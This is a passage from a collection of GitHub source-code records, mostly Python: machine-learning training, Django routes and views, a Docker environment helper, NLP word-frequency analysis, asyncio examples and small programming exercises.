train_one_epoch(\n model, criterion, dataLoader, optimizer, device,\n cfg['clip_max_norm'])\n lr_scheduler.step()\n\n with torch.no_grad():\n loss_val = valid_one_epoch(model, criterion, dataLoader_val, device)\n\n print(\"Epoch: {}, Avarge Train Loss: {:.2f}, Avarge Valid Loss: {:.2f}\".format(epoch, loss_train, loss_val))\n\n with (output_dir / \"log.txt\").open('a') as f:\n f.write(\"Epoch: {}, Train_Loss: {}\".format(\n epoch, loss_train) + \"\\n\" + \"Epoch: {}, Valid_Loss: {}\".format(epoch, loss_val) + \"\\n\")\n\n with (output_dir / \"log.csv\").open('ab') as f:\n np.savetxt(f, np.array(\n [[epoch, loss_train, loss_val]]), delimiter=\",\")\n\n torch.save({\n 'model': model.state_dict(),\n 'optimizer': optimizer.state_dict(),\n 'lr_scheduler': lr_scheduler.state_dict(),\n 'epoch': cfg['epochs'],\n 'cfgs': cfg,\n }, '{}/checkpoint.pth'.format(output_dir))\n\n total_time = time.time() - start_time\n total_time_str = str(datetime.timedelta(seconds=int(total_time)))\n torch.save(model.state_dict(), '{}/wt.pt'.format(cfg['output_dir']))\n print('Training time {}'.format(total_time_str))\n\n\nif __name__ == '__main__':\n with open('config/cfg.yaml', 'r') as loadfile:\n config = yaml.load_all(loadfile, Loader=yaml.FullLoader)\n config_all = [x for x in config]\n\n # train mode\n config = config_all[0]\n\n if config['output_dir']:\n Path(config['output_dir']).mkdir(parents=True, exist_ok=True)\n\n main(config)\n","repo_name":"firslov/DETR-self","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":4258,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"36805082175","text":"from django.urls import path\nfrom . import views\nfrom django.conf import settings\nfrom django.conf.urls.static import static\nfrom django.conf.urls import url\nfrom rest_framework.urlpatterns import format_suffix_patterns\n\nurlpatterns = [\n\n\t# 127.0.0.1:8000/shared\n path('shareNote/', views.shareNote, name=\"shareNote\"),\n path('deleteSharedNote/', views.deleteSharedNote, name=\"deleteSharedNote\"),\n path('noteSharedTo', views.noteSharedTo, name=\"noteSharedTo\"),\n path('getFriends', views.getFriends, name=\"getFriends\"),\n path('sharedNotes', views.sharedNotes, name=\"sharedNotes\"),\n path('getUnshareFriends', views.getUnshareFriends, name=\"getUnshareFriends\"),\n path('commentOnNote', views.commentOnNote.as_view()),\n path('likeOnNote', views.likeOnNote.as_view()),\n path('noteDetails',views.noteDetails, name=\"noteDetails\"),\n path('selfSharedNoteDetails', views.selfSharedNoteDetails, name=\"selfSharedNoteDetails\"),\n path('specificNoteDetail', views.specificNoteDetail, name=\"specificNoteDetail\"),\n path('allUserFriends', views.allUserFriends, name=\"allUserFriends\"),\n path('specificNoteDetailForGit', views.specificNoteDetailForGit, name=\"specificNoteDetailForGit\"),\n path(\"noteDetailsForNative\", views.noteDetailsForNative, name=\"noteDetailsForNative\"),\n path('selfSharedNoteDetailsForNative', views.selfSharedNoteDetailsForNative, name=\"selfSharedNoteDetailsForNative\"),\n path('specificNoteDetailForComments', views.specificNoteDetailForComments, name=\"specificNoteDetailForComments\"),\n\n] + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n\nurlpatterns=format_suffix_patterns(urlpatterns)\n","repo_name":"abhinavsharma629/WorkSpace-Api","sub_path":"Shared/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1650,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"9278282461","text":"def solution(record):\n result = []\n ment = ['님이 들어왔습니다.', '', \"님이 나갔습니다.\"]\n users = {}\n for re in record:\n tmp = re.split()\n cmd = tmp[0]\n uid = tmp[1]\n if cmd == \"Enter\":\n name = tmp[2]\n users[uid] = name\n result.append([uid, 0])\n elif cmd == \"Change\":\n name = tmp[2]\n users[uid] = name\n else: # leave\n result.append([uid, 2])\n for i in range(len(result)):\n uid, cmd = result[i]\n result[i] = \"\".join(users[uid])+ment[cmd]\n\n return result\n","repo_name":"MSIQOC/PythonAlgorithmStudy","sub_path":"history/2021/14주차 부르트포스,비트마스킹/프로그래머스/오픈채팅방/김재환.py","file_name":"김재환.py","file_ext":"py","file_size_in_byte":610,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"35338814282","text":"import re\nimport shutil\nfrom pathlib import Path\nfrom subprocess import CompletedProcess, run\nfrom typing import Any, Dict, List, NewType, Optional, Tuple\n\nimport srsly\nfrom ._types import EnvData, URLString\nfrom .checks import docker_installed, docker_running, run_docker_checks\nfrom .consts import (\n DEVCONTAINER_TEMPLATE,\n DOCKERFILE_TEMPLATE,\n DOCKERFILE_TEMPLATE_WITH_REQUIREMENTS,\n)\nfrom .github import get_requirements_from_gist\nfrom wasabi import msg\n\n\ndef create(env_data: EnvData):\n run_docker_checks()\n\n folder_path = Path(env_data.folder_name).resolve()\n msg.info(f\"Creating Folder: {folder_path}\")\n folder_path.mkdir(parents=True, exist_ok=False)\n\n msg.info(f\"Creating Environment: {env_data.environment_name}\")\n (folder_path / \".devcontainer\").mkdir(exist_ok=False)\n (folder_path / \".devcontainer\" / \"devcontainer.json\").write_text(\n DEVCONTAINER_TEMPLATE.format(environment_name=env_data.environment_name)\n )\n dockerfile_path = folder_path / \"Dockerfile\"\n if env_data.requirements_txt_gist:\n get_requirements_from_gist(env_data.requirements_txt_gist, folder_path)\n dockerfile_path.write_text(\n DOCKERFILE_TEMPLATE_WITH_REQUIREMENTS.format(\n python_version=env_data.python_version\n )\n )\n else:\n dockerfile_path.write_text(\n DOCKERFILE_TEMPLATE.format(python_version=env_data.python_version)\n )\n if env_data.options.build_image:\n msg.info(\"Building Docker Image\")\n run(\n [\n \"docker\",\n \"build\",\n \"-f\",\n str(dockerfile_path),\n \"-t\",\n str(env_data.environment_name),\n str(folder_path),\n ]\n )\n msg.good(\"Built Docker Image\")\n\n srsly.write_yaml(folder_path / \".dispenv.yaml\", env_data.dict())\n\n\ndef cleanup(dispenv_data: Dict[str, Any]) -> None:\n msg.info(\"Removing Folder\")\n folder_path = Path(dispenv_data[\"folder_name\"]).resolve()\n run([\"rm\", \"-rf\", str(folder_path)], capture_output=True)\n msg.info(\"Stopping containers running image.\")\n docker_ps_output = run([\"docker\", \"ps\", \"-a\"], capture_output=True)\n container_ids = get_containers_running_image(\n docker_ps_output, dispenv_data[\"environment_name\"]\n )\n for cid in container_ids:\n run([\"docker\", \"stop\", cid], capture_output=True)\n run([\"docker\", \"rm\", cid], capture_output=True)\n\n msg.info(\"Removing image.\")\n docker_ps_output = run([\"docker\", \"images\"], capture_output=True)\n for image in get_images(docker_ps_output, dispenv_data[\"environment_name\"]):\n run([\"docker\", \"rmi\", image])\n msg.good(\"Cleanup Complete.\")\n\n\ndef _imagecheck(input_image: str, reference_image: str):\n # vscode-dev container start with `vsc`\n input_image = input_image.strip()\n vsc_image = input_image.startswith(f\"vsc-{reference_image}\")\n default_image = input_image == reference_image\n return vsc_image or default_image\n\n\ndef get_containers_running_image(\n docker_ps_process: CompletedProcess, image_name: str\n) -> List[str]:\n lines = [\n line.split()\n for line in docker_ps_process.stdout.decode().split(\"\\n\")[1:]\n if line.strip()\n ]\n container_ids_running_image = [\n line[0].strip() for line in lines if _imagecheck(line[1], image_name)\n ]\n return container_ids_running_image\n\n\ndef get_images(docker_images_process, image_name):\n lines = [\n line.split()\n for line in docker_images_process.stdout.decode().split(\"\\n\")[1:]\n if line.strip()\n ]\n images = [line[0].strip() for line in lines if _imagecheck(line[0], image_name)]\n return images\n","repo_name":"pmbaumgartner/dispenv","sub_path":"src/dispenv/docker.py","file_name":"docker.py","file_ext":"py","file_size_in_byte":3735,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"68"} +{"seq_id":"35663230852","text":"import pandas as pd\nimport psycopg2 as ps\nfrom configparser import ConfigParser\nfrom sqlalchemy import create_engine\n\n# DATABASE CONFIG\ndef db_config(section, db_cred_path):\n \"\"\"\n Load credentials by a specific item name\n Args:\n item_name (:obj:`str`, required): name of the item that needs to load its value\n cred_path (:obj:`str`, required): Path to the .ini file where credentials are located.\n \"\"\"\n parser = ConfigParser()\n parser.read(db_cred_path)\n db = {}\n if parser.has_section(section):\n params = parser.items(section)\n for param in params:\n db[param[0]] = param[1]\n else:\n raise Exception('Section {0} not found in the {1} file'.format(section, db_cred_path))\n return db\n\ndef db_query(query, section, db_cred_path):\n db_cred = db_config(section, db_cred_path)\n db_uri = 'postgresql://{}:{}@{}:{}/{}'.format(db_cred['user'], db_cred['password'], db_cred['host'], db_cred['port'], db_cred['database'])\n engine = create_engine(db_uri)\n try:\n query_result = pd.read_sql(query, engine)\n return query_result\n except (Exception, ps.DatabaseError) as error:\n print(error)\n\n","repo_name":"thinh-vu/pydata_master","sub_path":"pydata_master/database_connect.py","file_name":"database_connect.py","file_ext":"py","file_size_in_byte":1165,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"42001693989","text":"#!/usr/bin/env python3\n## Ask user for filename ##\nfilename = input('Please enter the filename:')\n\n## create file object in \"r\"ead mode\nconfigfile = open(filename, 'r')\n\n## display file to the screen - .read()\nconfigblog = configfile.read()\n\n## break configblog across line boundaries (strips out \\n)\nconfiglist = configblog.splitlines()\n\n## display list with no '\\n'\nprint(configlist)\n\n## Count how many lines ##\nprint(len(configlist))\n\n## Always close your file\nconfigfile.close()\n","repo_name":"mjslawson/mycode","sub_path":"cfgread/cfg02.py","file_name":"cfg02.py","file_ext":"py","file_size_in_byte":483,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"68"} +{"seq_id":"12429655189","text":"from microtc.utils import tweet_iterator\nfrom EvoMSA.tests.test_base import TWEETS\nfrom text_models import Vocabulary\nfrom text_models.utils import date_range\nfrom wordcloud import WordCloud as WC\nimport numpy as np\nfrom collections import Counter\nfrom matplotlib import pylab as plt\nfrom scipy.optimize import minimize\nfrom joblib import Parallel, delayed\nfrom tqdm import tqdm\n# %pylab inline\n\n## Frequency of words\n\nwords = dict()\nfor tw in tweet_iterator(TWEETS):\n text = tw['text']\n for w in text.split():\n key = w.strip()\n try:\n words[key] += 1\n except KeyError:\n words[key] = 1\n\nwords['si']\n\n## Simpler version using Counter\n\nwords = Counter()\nfor tw in tweet_iterator(TWEETS):\n text = tw['text']\n words.update([x.strip() for x in text.split()])\n\nwords['si']\n\n# Zipf's Law\n\nfreq = [f for _, f in words.most_common()]\nrank = range(1, len(freq) + 1)\nplt.plot(rank, freq, '.')\nplt.grid()\nplt.xlabel('Rank')\nplt.ylabel('Frequency')\nplt.tight_layout()\nplt.savefig('zipf_law.png', dpi=300)\n\n\n## Inverse rank\n\nfreq = [f for _, f in words.most_common()]\nrank = 1 / np.arange(1, len(freq) + 1)\nplt.plot(rank, freq, '.')\nplt.grid()\nplt.xlabel('Inverse Rank')\nplt.ylabel('Frequency')\nplt.tight_layout()\nplt.savefig('zipf_law2.png', dpi=300)\n\n## OLS\n\nX = np.atleast_2d(rank).T\nc = np.linalg.lstsq(X, freq, rcond=None)[0]\nc\nhy = np.dot(X, c)\nplt.plot(rank, freq, '.')\nplt.plot(rank, hy)\nplt.legend(['Measured', 'Predicted'])\nplt.grid()\nplt.xlabel('Inverse Rank')\nplt.ylabel('Frequency')\nplt.tight_layout()\nplt.savefig('zipf_law3.png', dpi=300)\n\n# Heaps' Law\n\nwords = Counter()\ntokens_voc= list()\nfor tw in tweet_iterator(TWEETS):\n text = tw['text']\n words.update([x.strip() for x in text.split()])\n tokens_voc.append([sum(list(words.values())),\n len(words)])\n\nn = [x[0] for x in tokens_voc]\nv = [x[1] for x in tokens_voc]\nplt.plot(n, v, '.')\nplt.grid()\nplt.xlabel('Number of tokens')\nplt.ylabel('Vocabulary Size')\nplt.tight_layout()\nplt.savefig('heaps_law.png', dpi=300)\n\n## Optimization\n\ndef f(w, y, x):\n k, beta = w\n return ((y - k * x**beta)**2).sum()\n\nn = np.array(n)\nv = np.array(v)\nres = minimize(f, np.array([1, 0.5]), (v, n))\nk, beta = res.x\nk, beta\n\nplt.plot(n, v, '.')\nplt.plot(n, k*n**beta)\nplt.legend(['Measured', 'Predicted'])\nplt.grid()\nplt.xlabel('Number of tokens')\nplt.ylabel('Vocabulary Size')\nplt.tight_layout()\nplt.savefig('heaps_law2.png', dpi=300)\n\n\n# Activities\ndate = dict(year=2022, month=1, day=10)\nvoc = Vocabulary(date, lang='Es', country='MX')\nwords = {k: v for k, v in voc.voc.items() if not k.count('~')}\n\nwc = WC().generate_from_frequencies(words)\nplt.imshow(wc)\nplt.axis('off')\nplt.tight_layout()\nplt.savefig('wordcloud_mx.png', dpi=300)\n\n## Zipf's Law - $$f=\\frac{c}{r}$$\n\ncountries = ['MX', 'CO', 'ES', 'AR',\n 'PE', 'VE', 'CL', 'EC',\n 'GT', 'CU', 'BO', 'DO', \n 'HN', 'PY', 'SV', 'NI', \n 'CR', 'PA', 'UY']\nvocs = Parallel(n_jobs=-1)(delayed(Vocabulary)(date,\n lang='Es',\n country=country)\n for country in tqdm(countries))\nwords = [{k: v for k, v in voc.voc.items() if not k.count('~')}\n for voc in vocs]\n\ndef zipf(data):\n freq = [f for _, f in Counter(data).most_common()]\n rank = 1 / np.arange(1, len(freq) + 1)\n X = np.atleast_2d(rank).T\n return np.linalg.lstsq(X, freq, rcond=None)[0]\n\nzipf_c = [zipf(w) for w in words]\ntokens = [sum(list(w.values())) for w in words]\n\n\nlst = [(a, b[0], c) for a, b, c in zip(countries, zipf_c, tokens)]\nlst.sort(key=lambda x: x[1], reverse=True)\n\nfor a, b, c in lst:\n print(\"| {} | {:0.2f} | {:d} |\".format(a, b,c))\n\n\nX = np.array([(b[0], c) for b, c in zip(zipf_c, tokens)])\ncorr = np.corrcoef(X.T)\n\n\nfor c in corr:\n print(\"| {:0.4f} | {:0.4f} |\".format(*c))\n\n\n## Heaps' Law - $$\\mid v \\mid = kn^\\beta$$\n\nCOUNTRIES = ['MX', 'CO', 'ES', 'AR',\n 'PE', 'VE', 'CL', 'EC',\n 'GT', 'CU', 'BO', 'DO', \n 'HN', 'PY', 'SV', 'NI', \n 'CR', 'PA', 'UY']\n\ndef get_words(date=dict(year=2022, month=1, day=10)):\n \n\n vocs = Parallel(n_jobs=-1)(delayed(Vocabulary)(date,\n lang='Es',\n country=country)\n for country in tqdm(COUNTRIES))\n words = [{k: v for k, v in voc.voc.items() if not k.count('~')}\n for voc in vocs]\n return words \n\n\ndef voc_tokens(data):\n cnt = Counter(data[0])\n output = [[len(cnt), sum(list(cnt.values()))]]\n for x in data[1:]:\n cnt.update(x)\n _ = [len(cnt), sum(list(cnt.values()))]\n output.append(_)\n output = np.array(output)\n return output[:, 0], output[:, 1]\n\ninit = dict(year=2021, month=11, day=1)\nend = dict(year=2021, month=11, day=30)\ndates = date_range(init, end)\nwords = [get_words(d) for d in dates]\nww = [[w[index] for w in words] for index in range(len(COUNTRIES))]\n\nn_mx, v_mx = voc_tokens(ww[0])\n","repo_name":"INGEOTEC/NLP-Course","sub_path":"code/02Vocabulary.py","file_name":"02Vocabulary.py","file_ext":"py","file_size_in_byte":5110,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"68"} +{"seq_id":"32057296676","text":"from collections import defaultdict\n\nfrom ingestor.utils.env import env\nfrom ingestor.utils.logging_service import LoggingService\n\nlogger = LoggingService('extract_hashtags_from_tweets_list').logger\n\nprofile = env('PROFILE_NAME')\n\n\ndef extract_hashtags(tweets: list) -> dict:\n hashtags_found = defaultdict(int)\n\n for tweet in tweets:\n tweet_hashtags = tweet['entities']['hashtags']\n [_add_to_aggregate(hashtags_found, tweet_hashtag['text'].lower()) for tweet_hashtag in tweet_hashtags]\n\n return hashtags_found\n\n\ndef _add_to_aggregate(aggregate_dict: dict, key: str):\n aggregate_dict[key] = aggregate_dict[key] + 1\n","repo_name":"DEV3L/archive","sub_path":"projects/learning-journal/brain-bit-ingestor/ingestor/extractors/extract_hashtags_from_tweets_list.py","file_name":"extract_hashtags_from_tweets_list.py","file_ext":"py","file_size_in_byte":640,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"2544954348","text":"# Email View\nfrom django.conf import settings\nfrom django.core.mail import EmailMessage, EmailMultiAlternatives\nfrom django.shortcuts import render\nfrom django.template.loader import render_to_string\nfrom django.utils.html import strip_tags\n\n\ndef sendEmail(emailto, case, subject, attached):\n email_from = settings.EMAIL_HOST_USER\n recipient_list = [\n emailto,\n ]\n\n if case == \"sign_up\":\n template = 'sendEmail/sign_up_email.html'\n data = f'{settings.BASE_FRONT_URL}/confirm/?code={attached}' #code\n\n elif case == \"reset_password\":\n template = 'sendEmail/reset_password_email.html'\n data = f'{settings.BASE_FRONT_URL}/recoveruser/confirm/?code={attached}' #code\n\n elif case == \"contact_us\":\n template = 'sendEmail/contact_us_response_email.html'\n data = attached #reply\n elif case == \"photo_request_success\":\n template = 'sendEmail/photo_request_success_email.html'\n data = attached #array list. Each element is a dict that contains title, cc and url of the photo approved\n elif case == \"photo_request_failure\":\n template = 'sendEmail/photo_request_failure_email.html'\n data = '' #automessage from template\n\n elif case == 'complete_guest_registration':\n template = 'sendEmail/complete_guest_registration.html'\n data = f'{settings.BASE_FRONT_URL}/complete_guest_registration/?code={attached}'\n\n html_message = render_to_string(template, {'data': data})\n email = EmailMessage(\n subject=subject,\n body=html_message,\n from_email=email_from,\n to=recipient_list,\n )\n email.content_subtype = \"html\"\n if case == \"photo_request_success\":\n for element in attached:\n email.attach_file(settings.MEDIA_ROOT +\n element[\"url\"]) #url without /media/\n email.send()\n return","repo_name":"leit-uchile/memoriafotografica","sub_path":"backend/WebAdmin/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1875,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"68"} +{"seq_id":"16067621945","text":"import time\nimport sys\nfrom threading import Thread\nfrom threading import Lock\n\nclass Th(Thread):\n def __init__ (self, word, esp, texto):\n Thread.__init__(self)\n self.word = word\n self.esp = esp\n self.texto = texto\n\n def run(self):\n lock.acquire()\n if self.word[7] == 'a':\n with open('WordList.txt', 'a') as arq:\n arq.write(self.word)\n else:\n with open('WordList.txt', 'a') as arq:\n arq.write(\" \")\n arq.write(self.word)\n self.chave=montarchave(self.texto,self.word)\n self.textoDes=descifragem(self.texto,self.chave,self.esp)\n if self.textoDes.find('amor') != -1:\n print(\"Texto Desifrado: \"+self.textoDes)\n with open('resposta.txt', 'a') as arq:\n arq.write(textoDes+'\\n')\n arq.write(\"Chave: \"+self.word+\"\\n\")\n lock.release()\n \ndef descifragem(texto, chave, espacos):\n textoDescifrado=\"\"\n for i in range(len(texto)):\n aux = ord(texto[i])-97\n aux2 = ord(chave[i])-97\n temp = ((aux-aux2)%26)+97\n for j in espacos:\n if j.find(',') != -1:\n j = j.split(',')\n if int(j[0]) == i:\n textoDescifrado+=\",\"\n elif j.find('.') != -1:\n j = j.split('.')\n if int(j[0]) == i:\n textoDescifrado+=\".\"\n elif int(j) == i:\n textoDescifrado+=\" \"\n textoDescifrado+=chr(temp)\n return textoDescifrado\n\ndef montarchave(texto, chave):\n while(len(chave)/', DetailTransactionView.as_view(), name=\"DetailTransactionView\"),\n path('creatrefinance/', CreateTransactionView.as_view(), name=\"CreateTransactionView\"),\n path('updatefinance//', UpdateTransactionView.as_view(), name=\"UpdateTransactionView\"),\n path('updatetransaction//', ModifierTransactionView.as_view(), name=\"ModifierTransactionView\"),\n path('deletefinance//', DeleteTransactionView.as_view(), name=\"DeleteTransactionView\"),\n path('listefinance/', ListeTransactionView.as_view(), name=\"ListeTransactionView\"),\n path('toutelestransactions/', TransactionListAPIView.as_view(), name=\"TransactionListAPIView\"),\n path('transactions//transaction/', TransactionListUserAPIView.as_view(), name='TransactionListUserAPIView'),\n] ","repo_name":"chakour-ibrahim/mon_test_django","sub_path":"transfert_argent/serviceFinance/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":966,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"75009218136","text":"# 05-01. Functions Advanced - Lab\n# 07. Chairs\n\ndef chairs(names, count, curr_names=[]):\n if len(curr_names) == count:\n print(', '.join(curr_names))\n return\n\n for i in range(len(names)):\n curr_names.append(names[i])\n chairs(names[i+1:], count, curr_names)\n curr_names.pop()\n\n\npeople = input().split(', ')\nn = int(input())\n\nchairs(people, n)\n\n# from itertools import combinations\n#\n# result = list(combinations(input().split(', '), int(input())))\n#\n# for x, y in result:\n# print(x, y, sep=', ')\n","repo_name":"emma-metodieva/SoftUni_Python_Advanced_202106","sub_path":"05. Functions Advanced/05-01-07. Chairs.py","file_name":"05-01-07. Chairs.py","file_ext":"py","file_size_in_byte":539,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"71447870296","text":"# asyncio_queue.py\nimport asyncio\n\n\nasync def consumer(n, q: asyncio.Queue):\n print(f\"consumer {n}: starting\")\n while True:\n print(f\"consumer {n}: waiting for item\")\n item = await q.get()\n print(f\"consumer {n}: has item {item}\")\n if item is None:\n # None은 멈추라는 시그널\n q.task_done()\n break\n else:\n await asyncio.sleep(0.01 * item)\n q.task_done()\n print(f\"consumer {n}: ending\")\n\n\nasync def producer(q: asyncio.Queue, num_workers):\n print(\"producer: starting\")\n # 작업을 시뮬레이션하고자 큐에 몇 개의 수를 추가\n for i in range(num_workers * 3):\n await q.put(i)\n print(f\"producer: added task {i} to the queue\")\n # consumer들에게 종료 시그널을 주고자 큐에 None 항목 추가\n for i in range(num_workers):\n await q.put(None)\n print(\"producer: waiting for queue to empty\")\n await q.join()\n print(\"producer: ending\")\n\n\nasync def main(loop: asyncio.AbstractEventLoop, num_consumers):\n # 고정된 크기의 큐를 생성해 consumer가 항목을 추출할 때까지 producer 가 블로킹한다.\n q = asyncio.Queue(maxsize=num_consumers)\n\n # consumer 작업 예약\n consumers = [loop.create_task(consumer(i, q)) for i in range(num_consumers)]\n\n # producer 작업 예약\n prod = loop.create_task(producer(q, num_consumers))\n\n # 모든 코루틴이 완료될 때까지 대기\n await asyncio.wait(consumers + [prod])\n\n\nevent_loop = asyncio.get_event_loop()\n\ntry:\n event_loop.run_until_complete(main(event_loop, 2))\nfinally:\n event_loop.close()\n","repo_name":"hwangyoungjae/hwangyoungjae.github.io","sub_path":"example/10.5_asyncio/asyncio_queue.py","file_name":"asyncio_queue.py","file_ext":"py","file_size_in_byte":1651,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"70110834776","text":"import time\r\nimport numpy as np\r\nimport random\r\nimport math\r\nimport matplotlib.pyplot as plt\r\nfrom matplotlib.pylab import figure\r\ndef EWAF(X,Y,options):\r\n\t########################################################\r\n\t########################################################\r\n\t# Change label space from {-1, +1} to {0, 1}\r\n\tY=(Y+1)/2\r\n\t########################################################\r\n\t########################################################\r\n\r\n\tn,d = X.shape\r\n\teta = options['eta']\t\r\n\tW = options['W']\r\n\tN = options['num_all_experts']\r\n\r\n\tw = np.ones(N)/N\r\n\tdelta = options['delta']\r\n\tloss_experts = np.zeros(N)\r\n\tloss_forecaster = 0\r\n\tloss_experts_queried = np.zeros((1,N))\r\n\tloss_experts_unqueried = np.zeros((1,N))\r\n\tnum_queried = 1\r\n\tnum_non_queried = 0\t\r\n\tnum_accurate_preditcted = 0\r\n\r\n\twij_list=[]\r\n\r\n\trandom.seed(time.time())\r\n\tstart = time.time()\r\n\tfor t in range(n):\r\n\t\txt = X[t]\r\n\t\tyt = Y[t]\r\n\r\n\t\t# receive annotations and transfer the annotation from [-1,+1] to [0,+1]\r\n\t\timport pdb\r\n\t\t# pdb.set_trace()\r\n\t\tf=np.maximum(np.zeros(N),np.minimum(np.ones(N), np.dot(W,xt.transpose()).flatten()+0.5))\t\r\n\t\t# add noisy annotations\r\n\t\tfor i in range(options['num_noisy_experts']):\r\n\t\t\tf[5+i]=random.random()\r\n\t\t\r\n\t\t_p_t = np.dot(f,w.transpose())[0,0]\t\t\r\n\t\t\r\n\t\t_hat_y_t = 1 if _p_t >= 0.5 else 0\r\n\r\n\t\t_query_or_not=False\r\n\t\t\r\n\t\tif options['alg_name']=='EWAF':\t\t\t\r\n\t\t\t_query_or_not = True\r\n\t\t\r\n\t\telif options['alg_name']=='AEWAF':\t\t\r\n\t\t\t# if (np.amax(f)-np.amin(f)) > 0.99:\r\n\t\t\t# \twij_list.append((np.amax(f)-np.amin(f)))\t\r\n\t\t\t\r\n\t\t\tif (np.amax(f)-np.amin(f)) > delta:\t\t\t\t\r\n\t\t\t\t_query_or_not = True\r\n\t\t\r\n\t\telif options['alg_name'] == 'RAEWAF':\t\t\t\r\n\t\t\t_mu = float(num_non_queried)/(num_queried+1)\r\n\t\t\t_rel = np.zeros((N,N))\r\n\r\n\t\t\tfor i in range(N):\r\n\t\t\t\tfor j in range(N):\t\t\t\t\t\r\n\t\t\t\t\t_rel[i,j] = math.exp( -eta*((1+_mu)*loss_experts_queried[0,i] + loss_experts_queried[0,j]) )\r\n\t\t\t# _rel = np.power(_rel,-eta)\r\n\t\t\t# # print sumRel,f\r\n\t\t\t# if _rel.sum()== 0.0:\r\n\t\t\t# \t# print \"_sum_rel == 0.0 in RAEWAF\"\r\n\t\t\t# \t# print num_non_queried,num_queried,sumRel, _mu, loss_experts_queried\r\n\t\t\t# \tcontinue\r\n\t\t\t\r\n\t\t\t_rel_fij = 0.0\r\n\t\t\tfor i in range(N):\r\n\t\t\t\tfor j in range(i,N):\r\n\t\t\t\t\timport pdb\r\n\t\t\t\t\t# pdb.set_trace()\r\n\t\t\t\t\tabs_fij = abs(f[0,i]-f[0,j])\r\n\t\t\t\t\t_rel_fij = _rel_fij + _rel[i,j]*abs_fij\r\n\t\t\t\t\tif i != j:\r\n\t\t\t\t\t\t_rel_fij = _rel_fij + _rel[j,i]*abs_fij\t\t\r\n\t\t\t_wij = _rel_fij/_rel.sum();\r\n\t\t\t\r\n\t\t\t# wij_list.append(abs(_wij))\r\n\t\t\tif abs(_wij) > delta:\t\t\t\r\n\t\t\t\t_query_or_not = True\r\n\t\telse: # REWAF\r\n\t\t\tif random.random() <= delta:\r\n\t\t\t\t_query_or_not = True\r\n\t\t\r\n\t\t_ell_experts = np.absolute(f-yt)\r\n\t\tloss_experts = loss_experts + _ell_experts\r\n\t\tloss_forecaster = loss_forecaster + abs(_p_t-yt)\r\n\t\t\r\n\t\tif _hat_y_t == yt:\r\n\t\t\tnum_accurate_preditcted += 1\r\n\r\n\t\tif _query_or_not:\r\n\t\t\tnum_queried += 1\t\t\t\r\n\t\t\tloss_experts_queried = loss_experts_queried+_ell_experts\r\n\t\t\t# w = w*np.exp(-eta*_ell_experts)\r\n\t\t\tw = np.exp(-eta*loss_experts_queried)\r\n\t\t\tsum_w = np.sum(w)\r\n\t\t\tw = w/sum_w\r\n\t\telse: \r\n\t\t\tnum_non_queried += 1\t\t\r\n\t\t\r\n\t\t# loss_experts_unqueried = (float(num_non_queried)/float(num_queried))*loss_experts_queried\r\n\r\n\tend = time.time()\r\n\treg = loss_forecaster - np.amin(loss_experts)\t\r\n\t# if len(wij_list):\r\n\t# \tif options['alg_name'] in ['RAEWAF','AEWAF'] and options['que_ind'] == 0 and options['fold_ind']==0:\r\n\t# \t\twij_list.sort()\r\n\t# \t\t# print wij_list[20000],wij_list[10000]\r\n\t# \t\tif options['alg_name'] == 'RAEWAF':\r\n\t# \t\t\twij_list = [x for x in wij_list if x <= 0.00005]\r\n\r\n\t# \t\tfig = plt.figure()\r\n\t# \t\tax = fig.add_subplot(1,1,1) \r\n\t# \t\tplt.hist(np.asarray(wij_list))\r\n\t# \t\tplt.savefig(options['output_file_name']+'_his'+'.pdf')\r\n\t# \t\tplt.close(fig) \r\n\t# \t# print min(wij_list),max(wij_list)\r\n\treturn float(num_queried)/n, float(reg)/n, (end-start), float(num_accurate_preditcted)/n\t","repo_name":"haoshuji/RALEA","sub_path":"python_src/EWAF.py","file_name":"EWAF.py","file_ext":"py","file_size_in_byte":3807,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"6846164686","text":"#Miikka Mutanen\r\n#23.1.2017\r\n#tehtävä 2-4\r\n#Ohjelma laskee käyttäjän antamat komentorivi\r\n#arkumentit yhteen ja tulostaa ne\r\n#hylkää epäkelvot arkumentit\r\nimport doctest #testausta varten\r\nimport sys\r\n\r\n#Summaa listan luvut\r\n#return summa\r\ndef sum(lista):\r\n\t'''\r\n\t>>> sum([1,2,3,4,5])\r\n\t15\r\n\t>>> sum([0,0,0,0,0])\r\n\t0\r\n\t>>> sum([1.5,0,1.5,0,0])\r\n\t3.0\r\n\t>>> sum([-1.5,0,-1.6,0,0])\r\n\t-3.1\r\n\t>>> sum([-1.5,0,10.5,0,0])\r\n\t9.0\r\n\t>>> sum([1.5,0,1,0,0])\r\n\t2.5\r\n\t>>> sum([])\r\n\t0\r\n\t'''\r\n\tsumma=0\r\n\tfor i in lista:\r\n\t\tsumma+=i\r\n\treturn summa\r\n\r\nlista=[]\r\nfor i in sys.argv[1:]:\r\n\ttry:\r\n\t\tlista.append(int(i))\r\n\texcept ValueError:\r\n\t\tprint(\"Anna pelkästään kokonaislukuja\")\r\n\t\r\nprint(\"Total sum for args is 